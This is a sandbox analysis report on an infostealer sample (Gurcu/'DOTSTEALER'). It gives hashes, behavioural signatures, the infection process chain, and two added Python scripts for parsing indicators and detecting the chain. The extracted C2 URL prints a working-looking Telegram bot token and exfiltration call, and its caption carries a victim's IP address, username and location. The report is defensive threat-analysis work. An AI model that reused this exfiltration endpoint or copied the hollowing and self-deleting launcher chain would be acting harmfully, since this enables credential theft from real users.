Analysis

max time kernel: 94s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 07-12-2024 18:38

Static task: static1
Behavioral task: behavioral1
Sample: b-crypted.exe
Resource: win7-20240708-en
General

Target: b-crypted.exe
Size: 8.4MB
MD5: b45f3a137a961c8498ee21a246e983ec
SHA1: f7a2dc2bac844aad018498f224adf51f285c1f1b
SHA256: 17cc88b4f9976d16cc5c807e91b034fecc721f9988cc52e2056a01e99aabc900
SHA512: ee339e5f4853c425d838493aa9fdac55273601482b804be183367118832d4677375daa46e08755d1f472725cb9d35612e570095f1afffe3db1d336fb139d20bc
SSDEEP: 196608:HWIWSNScyO62XEXOV7QUY1MlROz8Uk2Ew2GdKxvY7n7wls8bg:NWSBybi7qelRc8UFAGwxAGs80
Malware Config

Family: gurcu
Extracted C2 (Telegram Bot API exfiltration endpoint, caption truncated as captured):
https://api.telegram.org/bot6031927554:AAEXTw-Bhx5o5i_JojmzmJzXPmNMBfive_Y/sendDocument?chat_id=918093463&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
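The extracted configuration is a Telegram Bot API call: the bot token sits in the URL path, the destination chat and the victim summary (an URL-encoded caption) sit in the query string. The following is an added example, not part of the sandbox report or of the sample, that pulls those indicators out of the URL above using only the Python standard library. Its input is the URL copied verbatim from the config (the caption is truncated on the page, so it stays truncated here); the second function is a hunting helper for the same token shape in arbitrary text.

```python
"""Pull indicators out of a Telegram Bot API exfiltration URL.

Added example for this report; not part of the sandbox output or of the sample.
EXTRACTED_C2 is the URL copied from the Malware Config section (caption
truncated there, so truncated here as well)."""
import re
from urllib.parse import parse_qs, urlsplit

EXTRACTED_C2 = (
    "https://api.telegram.org/bot6031927554:AAEXTw-Bhx5o5i_JojmzmJzXPmNMBfive_Y/"
    "sendDocument?chat_id=918093463&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0"
    "%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin"
    "%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan"
)

# Bot tokens look like <numeric bot id>:<secret>. The bot id is a stable
# indicator that can be shared; the secret is what a takedown request needs
# and should not be copied into tickets, so it is masked below.
_BOT_PATH = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>\w+)$")


def parse_telegram_exfil(url: str) -> dict:
    """Return host, bot id, masked secret, API method, chat id and the decoded
    caption split into key/value fields. Raises ValueError for other URLs."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL")
    m = _BOT_PATH.match(parts.path)
    if not m:
        raise ValueError("path does not look like /bot<id>:<token>/<method>")
    query = parse_qs(parts.query)            # parse_qs percent-decodes values
    caption = query.get("caption", [""])[0]
    fields = {}
    for line in caption.splitlines():        # "%0A" became "\n"
        if ": " in line:                     # "IP: 1.2.3.4" style lines only
            key, value = line.split(": ", 1)
            fields[key.strip()] = value
    secret = m["secret"]
    return {
        "host": parts.hostname,
        "bot_id": m["bot_id"],
        "secret_masked": secret[:4] + "..." + secret[-4:],
        "method": m["method"],
        "chat_id": query.get("chat_id", [""])[0],
        "caption": caption,
        "fields": fields,
    }


def find_bot_tokens(blob: str) -> list:
    """Hunt for Telegram bot tokens in arbitrary text (strings output, a memory
    dump, a proxy log). Returns only the numeric bot ids, never the secrets."""
    return re.findall(r"bot(\d{8,12}):[A-Za-z0-9_-]{30,}", blob)


if __name__ == "__main__":
    for key, value in parse_telegram_exfil(EXTRACTED_C2).items():
        print(f"{key}: {value!r}")
```

The decoded caption is the stealer's per-victim log header (name, public IP, username, geolocation); the `chat_id` and bot id are the indicators worth blocking or reporting, and the same `find_bot_tokens` pattern run over proxy logs will surface other samples talking to the same bot.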
Signatures

Gurcu family

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  description       | ioc                                                                                                    | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | RegAsm.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | systemuser.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | tempdatalogger.exe

Executes dropped EXE (2 IoCs)
  pid  | Process
  1744 | systemuser.exe
  1452 | tempdatalogger.exe

Loads dropped DLL (2 IoCs)
  pid  | Process
  1744 | systemuser.exe
  1452 | tempdatalogger.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow | ioc
  18   | raw.githubusercontent.com
  19   | raw.githubusercontent.com
  34   | raw.githubusercontent.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  40   | ip-api.com

Enumerates processes with tasklist (1 TTPs, 1 IoCs)
  pid  | Process
  4640 | tasklist.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                         | pid  | Process       | procid_target
  PID 3668 set thread context of 1820 | 3668 | b-crypted.exe | 90
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc                                                         | Process
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | b-crypted.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description       | ioc                                                                         | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | tempdatalogger.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0            | tempdatalogger.exe

Delays execution with timeout.exe (1 IoCs)
  pid | Process
  64  | timeout.exe
Suspicious behavior: EnumeratesProcesses (52 IoCs; identical rows collapsed)
  pid  | Process
  3668 | b-crypted.exe (2 entries)
  1744 | systemuser.exe (repeated entries)
  1452 | tempdatalogger.exe (repeated entries)
  The 52 entries are all from these three processes; systemuser.exe and tempdatalogger.exe account for the 50 entries after b-crypted.exe.
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description             | pid  | Process
  Token: SeDebugPrivilege | 3668 | b-crypted.exe
  Token: SeDebugPrivilege | 1744 | systemuser.exe
  Token: SeDebugPrivilege | 4640 | tasklist.exe
  Token: SeDebugPrivilege | 1452 | tempdatalogger.exe
Suspicious use of WriteProcessMemory (29 IoCs; identical rows collapsed, repeat count in brackets)
  description                           | pid  | Process            | procid_target
  PID 3668 wrote to memory of 1144 (x3) | 3668 | b-crypted.exe      | 89
  PID 3668 wrote to memory of 1820 (x8) | 3668 | b-crypted.exe      | 90
  PID 1820 wrote to memory of 1744 (x2) | 1820 | RegAsm.exe         | 91
  PID 1744 wrote to memory of 5016 (x2) | 1744 | systemuser.exe     | 94
  PID 5016 wrote to memory of 2136 (x2) | 5016 | cmd.exe            | 96
  PID 5016 wrote to memory of 4640 (x2) | 5016 | cmd.exe            | 97
  PID 5016 wrote to memory of 4232 (x2) | 5016 | cmd.exe            | 98
  PID 5016 wrote to memory of 64 (x2)   | 5016 | cmd.exe            | 99
  PID 5016 wrote to memory of 1452 (x2) | 5016 | cmd.exe            | 100
  PID 1452 wrote to memory of 4944 (x2) | 1452 | tempdatalogger.exe | 101
  PID 4944 wrote to memory of 1704 (x2) | 4944 | cmd.exe            | 103
Processes

[1] C:\Users\Admin\AppData\Local\Temp\b-crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\b-crypted.exe"
    PID: 3668
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        PID: 1144

    [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        PID: 1820
        - Checks computer location settings
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Roaming\systemuser.exe
            "C:\Users\Admin\AppData\Roaming\systemuser.exe"
            PID: 1744
            - Checks computer location settings
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat
                PID: 5016
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\system32\chcp.com
                    chcp 65001
                    PID: 2136

                [5] C:\Windows\system32\tasklist.exe
                    Tasklist /fi "PID eq 1744"
                    PID: 4640
                    - Enumerates processes with tasklist
                    - Suspicious use of AdjustPrivilegeToken

                [5] C:\Windows\system32\find.exe
                    find ":"
                    PID: 4232

                [5] C:\Windows\system32\timeout.exe
                    Timeout /T 1 /Nobreak
                    PID: 64
                    - Delays execution with timeout.exe

                [5] C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
                    "C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
                    PID: 1452
                    - Checks computer location settings
                    - Executes dropped EXE
                    - Loads dropped DLL
                    - Checks processor information in registry
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    - Suspicious use of WriteProcessMemory

                    [6] C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat
                        PID: 4944
                        - Suspicious use of WriteProcessMemory

                        [7] C:\Windows\system32\chcp.com
                            chcp 65001
                            PID: 1704
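The process tree above is the chain the report's signatures hit on: an executable in Temp starts RegAsm.exe with no arguments, writes to it and sets its thread context (consistent with process hollowing); the injected RegAsm.exe drops systemuser.exe; and a self-deleting batch file polls tasklist /fi "PID eq <dropper pid>" with find and timeout until the dropper has exited before it launches the next stage. The block below is an added example, not code from the sandbox or from the sample, that encodes those observations as detection rules over process-creation records. The records are constructed here to mirror the tree (the field names, modelled on Sysmon Event ID 1, are an assumption), with two benign events added to show that ordinary cmd.exe and RegAsm.exe use does not fire the rules.

```python
"""Detect the launcher chain from the process tree above in process-creation
telemetry. Added example for this report, not code from the sandbox or from the
sample. EVENTS is constructed to mirror the tree; the field names (parent image,
image, command line) are modelled on Sysmon Event ID 1 and are an assumption."""
import re

EVENTS = [
    {"pid": 3668, "ppid": 900, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\Admin\AppData\Local\Temp\b-crypted.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\b-crypted.exe"'},
    {"pid": 1820, "ppid": 3668, "parent": r"C:\Users\Admin\AppData\Local\Temp\b-crypted.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"pid": 1744, "ppid": 1820, "parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "image": r"C:\Users\Admin\AppData\Roaming\systemuser.exe",
     "cmd": r'"C:\Users\Admin\AppData\Roaming\systemuser.exe"'},
    {"pid": 5016, "ppid": 1744, "parent": r"C:\Users\Admin\AppData\Roaming\systemuser.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat'
            r' & Del C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat'},
    {"pid": 4640, "ppid": 5016, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\system32\tasklist.exe", "cmd": 'Tasklist /fi "PID eq 1744"'},
    {"pid": 64, "ppid": 5016, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\system32\timeout.exe", "cmd": "Timeout /T 1 /Nobreak"},
    # Constructed benign noise: an interactive cmd and a developer registering a DLL.
    {"pid": 7001, "ppid": 900, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmd": r'"C:\Windows\System32\cmd.exe" /C dir C:\temp'},
    {"pid": 7002, "ppid": 901, "parent": r"C:\Program Files\dotnet\dotnet.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmd": "RegAsm.exe /codebase MyComponent.dll"},
]

# cmd.exe /C <x>.bat & Del <x>.bat: the script removes itself after running.
SELF_DELETING_BAT = re.compile(r"/c\s+(?P<bat>\S+\.bat)\s*&\s*del\s+(?P=bat)", re.IGNORECASE)
# tasklist filtered on one PID: a batch file polling for a process to exit.
TASKLIST_PID_FILTER = re.compile(r'tasklist\s+/fi\s+"?pid\s+eq\s+(?P<pid>\d+)', re.IGNORECASE)
# Paths a standard user can write to; legitimate RegAsm callers live elsewhere.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (rule, pid) hits for the four behaviours seen in the tree."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, parent, cmd = basename(e["image"]), basename(e["parent"]), e["cmd"]
        if img == "cmd.exe" and SELF_DELETING_BAT.search(cmd):
            hits.append(("self_deleting_bat_launcher", e["pid"]))
        if img == "tasklist.exe" and parent == "cmd.exe":
            m = TASKLIST_PID_FILTER.search(cmd)
            launcher = by_pid.get(e["ppid"])          # the cmd.exe running the .bat
            # Filtering on cmd.exe's own parent PID means the script waits for
            # its dropper to exit (so the dropper can be deleted or replaced).
            if m and launcher and launcher["ppid"] == int(m["pid"]):
                hits.append(("tasklist_wait_for_parent_exit", e["pid"]))
        # RegAsm.exe normally gets an assembly path; no arguments plus a parent in a
        # user-writable directory is the hollowing target seen above.
        no_args = cmd.strip().strip('"').lower().endswith("regasm.exe")
        if img == "regasm.exe" and no_args and USER_WRITABLE.search(e["parent"]):
            hits.append(("regasm_hollowing_target", e["pid"]))
        if parent == "regasm.exe" and USER_WRITABLE.search(e["image"]):
            hits.append(("regasm_drops_payload", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The parent-PID correlation in the tasklist rule is what separates this launcher from an administrator's ad-hoc `tasklist /fi`: the filtered PID is the grandparent of tasklist.exe, i.e. the process that wrote the batch file. The same logic maps directly onto a SIEM query that joins process-creation events on ParentProcessId.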
Network
MITRE ATT&CK Enterprise v15

Credential Access
  Credentials from Password Stores (T1555): 1
    Credentials from Web Browsers (T1555.003): 1
  Unsecured Credentials (T1552): 1
    Credentials In Files (T1552.001): 1
Downloads

Filesize: 1.7MB
MD5: 65ccd6ecb99899083d43f7c24eb8f869
SHA1: 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256: aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512: 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Filesize: 300B
MD5: d88f63a793d6e94d0536aaa5d2ae8d04
SHA1: db98c760b934b16d483a2e5fe754f09f9678090e
SHA256: 08b649aa13b688cd6d5882cd1f4c1e5f64ecc087ac61d5f81029090e29b8534a
SHA512: cf6133c49799b3a73119649555f59c15018b3cfe0a69da67de637d523b8e0c5986d9c35945b6914f50d1d850896aad8ce512a8afc4d8a9772e27b8603248e5c7

Filesize: 149B
MD5: 9b50431381f90bb6149dbb5c85095c94
SHA1: 3eed9d5a930e860d2308abec184946022a258a08
SHA256: bc8d12c414c230d3c3d1e444a4a6af0bbe189ba0e810fd5aa3fd2873c5d32d4b
SHA512: a581e798ff3db6780740d71e184b98acd42f11a7c7fcbf1416a3b24833a7b09a51487ef382eea5987d5bb3d4fc14cd12be0fef6ba388083b8818256cdfc30480

Filesize: 116KB
MD5: f70aa3fa04f0536280f872ad17973c3d
SHA1: 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256: 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512: 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Filesize: 5.6MB
MD5: 5328cd66093855fbb2127332ad78cdd6
SHA1: 7605e73efa3a3bd1c42beddad226ccf355f80e4c
SHA256: 90daa714224ac1b53c423442d1cd0425bc678c721402ae757034258248d43106
SHA512: 0e4428281adf02fedaee64233fb63c1296009aa0dbe233036be841afb2bb5443769812389613ef696821cdc9750193599d2bda6b567b92301796bbea8a84098c